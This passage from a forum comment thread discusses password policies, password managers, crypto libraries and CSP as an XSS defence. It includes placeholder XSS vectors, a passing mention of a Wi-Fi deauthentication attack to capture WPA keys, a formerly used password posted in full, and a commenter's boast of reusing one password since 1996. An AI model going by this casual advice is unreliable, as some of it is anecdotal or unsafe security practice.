« First « Previous Comments 58 - 85 of 85 Search these comments
porkchopexpress saysThis isn’t my deep area of expertise, but what implementation language are you using?I live and breath cybersecurity. It's my job.
@porkchopexpress
Ah - found you. Besides OpenSSL, what do you suggest for a crypto library? I'm looking for AES256 and ECC public/private keypairs. I'm playing with the NaCL library:
https://libsodium.gitbook.io/doc/?source=patrick.net
But I'm running into an issue that the public/private keypairs it generates for different things (Diffie–Hellman versus digital signatures for example) I have to generate a completely new keypair rather than being able to reuse them. Got another library to suggest?
The worse is autogenerated passwords and you don't have easy access to change it.Agreed. Long passphrases for ones you have to remember such as a vault or network password, but random generated at least 16 (I do 20) characters in a password manager for everything else because you won’t have to remember them. If the target system uses a good hash algo, they’ll never get cracked.
bm9XjoK#3nMG0cV0
This was a real password I had to use at one time. Which I always copied and pasted into the password box. I bet that's easy to capture for a hacker, than figuring out the complex password.
My point is the more complex they make passwords, then the lazier the user will be to have that impossible password handy, and the easier it will be for the baddies to retrieve it for the users actions of storing it on a sticky note, or pasting the password from a file on their computer.
This isn’t my deep area of expertise, but what implementation language are you using?
Libgcrypt or crypto++ could be other options
I just did a light scan and nothing too concerning showed up.
@porkchopexpress If you have security advice for patrick.net, please let me know.
Please poke around and tell me if you can break in in any way.
That chart is useless and not true in most cases. Passwords are not hacked instantly or in a time, it's tries!
Tenpoundbass saysThat chart is useless and not true in most cases. Passwords are not hacked instantly or in a time, it's tries!
Seems you've never heard of the re-authentication attack for wifi. I force all your devices off, then grab your WPA key when you log back in.
My point is the more complex they make passwords, then the lazier the user will be to have that impossible password handy, and the easier it will be for the baddies to retrieve it for the users actions of storing it on a sticky note, or pasting the password from a file on their computer.
That's why companies need to have password manager subscriptions. Make it stupid simple for the users to create and save complex passwords without having to ever write them down or memorize them/
What they will do get a list of users, setup a bot farm, and run a dictionary against every user in the list.
How does that work when after three tries the account is locked out?
FWIW I am using the exact same password I created for my very first Windows 95 machine and used to sign up for AOL in 1996.
It has never been compromised.
How does that work when after three tries the account is locked out?
FWIW I am using the exact same password I created for my very first Windows 95 machine and used to sign up for AOL in 1996.
It has never been compromised.
I'm just pointing out that security is 99.999% not getting a phishing attack.So true. Over 90% of successful cyber attacks involve some sort of social engineering (e.g., phishing) because it works.
HeadSet saysHow does that work when after three tries the account is locked out?
Maybe not the best example, but the point is, the attack will be much broader than a single user, and weak password requirements mean less guesses before getting a match.
I don't even use a recognizable username on my machine, much less a common password, and "root" is disabled by default.
My point is the more complex they make passwords, then the lazier the user will be to have that impossible password handy, and the easier it will be for the baddies to retrieve it for the users actions of storing it on a sticky note, or pasting the password from a file on their computer.
<script>code</script>or
<a onclick="...code..."></a>you can easily and robustly thwart most xss vectors and sinks. CSP can potentially be very powerful against xss if you dont mind writing your code in certain ways, such as putting all js in .js files. CSP can support allowing you to use inline script tags safely if you tag each with a random-per-page-load nonce, or tagged with a checksum of the code contents.
It's true, you can make a very strong password with just lowercase. But that's not the point - the policy is used because SOME users will create weak passwords if the system lets them type it in
CSP can potentially be very powerful against xss if you dont mind writing your code in certain ways, such as putting all js in .js files.
« First « Previous Comments 58 - 85 of 85 Search these comments
And if anyone's interested I use Keepass, none of that cloud shit.